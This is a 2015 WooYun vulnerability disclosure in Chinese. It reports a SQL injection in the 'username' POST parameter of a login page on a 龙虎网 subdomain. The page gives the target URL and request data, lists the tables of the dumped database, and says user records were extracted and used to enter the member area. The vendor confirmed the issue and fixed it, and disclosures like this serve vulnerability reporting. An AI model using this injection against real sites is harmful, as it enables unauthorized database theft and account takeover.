龙虎网某子站点sql post注入 | wooyun-2015-0133730| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133730

漏洞标题：龙虎网某子站点sql post注入

漏洞作者：水晶

提交时间：2015-08-13 12:12

修复时间：2015-10-01 16:42

公开时间：2015-10-01 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-13：细节已通知厂商并且等待厂商处理中
2015-08-17：厂商已经确认，细节仅向厂商公开
2015-08-27：细节向核心白帽子及相关领域专家公开
2015-09-06：细节向普通白帽子公开
2015-09-16：细节向实习白帽子公开
2015-10-01：细节向公众公开

简要描述：

龙虎网某子站点用户登陆post注入一枚

详细说明：

希望没有重复

漏洞证明：

http://aly.longhoo.net/Login.aspx
data:username=test&userpassword=123456&Button1=%E7%99%BB%E9%99%86 username有注入

Database: projecthope
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+  |
| dbo.leaveMessage          | 28014   |
| dbo.users                 | 1489    |   |
| dbo.userInfo              | 1360    |
| dbo.loveList              | 579     |     |
| dbo.userlogin             | 549     |
| dbo.city                  | 341     |    |
| dbo.message               | 232     |
| dbo.donate_student_record | 141     |
| dbo.company               | 127     |
| dbo.comLevel              | 126     |   |
| dbo.sysconstraints        | 118     |
| dbo.user_prepaid          | 109     |
| dbo.ad                    | 83      |
| dbo.userMenu              | 60      |
| dbo.menu                  | 48      |
| dbo.link                  | 37      |
| dbo.product               | 37      |
| dbo.adtype                | 35      |
| dbo.provice               | 32      |
| dbo.downLoad              | 21      |
| dbo.equipment             | 15      |
| dbo.referServe            | 15      |
| dbo.messageType           | 13      |
| dbo.productBtype          | 12      |
| dbo.productSStype         | 12      |
| dbo.replyReferServe       | 12      |
| dbo.languages             | 11      |
| dbo.post                  | 10      |
| dbo.ContributionCount     | 6       |
| dbo.reply                 | 5       |
| dbo.[position]            | 4       |
| dbo.auction_msg           | 4       |
| dbo.book                  | 4       |
| dbo.companyLevel          | 4       |
| dbo.messageBtype          | 4       |
| dbo.news                  | 4       |
| dbo.auction_type          | 3       |
| dbo.login                 | 3       |
| dbo.resume                | 3       |
| dbo.syssegments           | 3       |
| dbo.teachers              | 3       |
| dbo.linkType              | 2       |
| dbo.userType              | 2       |
| dbo.apply                 | 1       |
| dbo.downloadType          | 1       |
| dbo.sqlmapfile            | 1       |
+---------------------------+---------+

跑了几条users表的数据，可成功进入会员中心。

修复方案：

过滤

版权声明：转载请注明来源水晶@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-08-17 16:41

厂商回复：

已处理，感谢您的提交

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133730

漏洞标题：龙虎网某子站点sql post注入

相关厂商：龙虎网

漏洞作者：水晶

提交时间：2015-08-13 12:12

修复时间：2015-10-01 16:42

公开时间：2015-10-01 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源水晶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133730

漏洞标题：龙虎网某子站点sql post注入

相关厂商：龙虎网

漏洞作者： 水晶

提交时间：2015-08-13 12:12

修复时间：2015-10-01 16:42

公开时间：2015-10-01 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133730"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 水晶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：水晶

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源水晶@乌云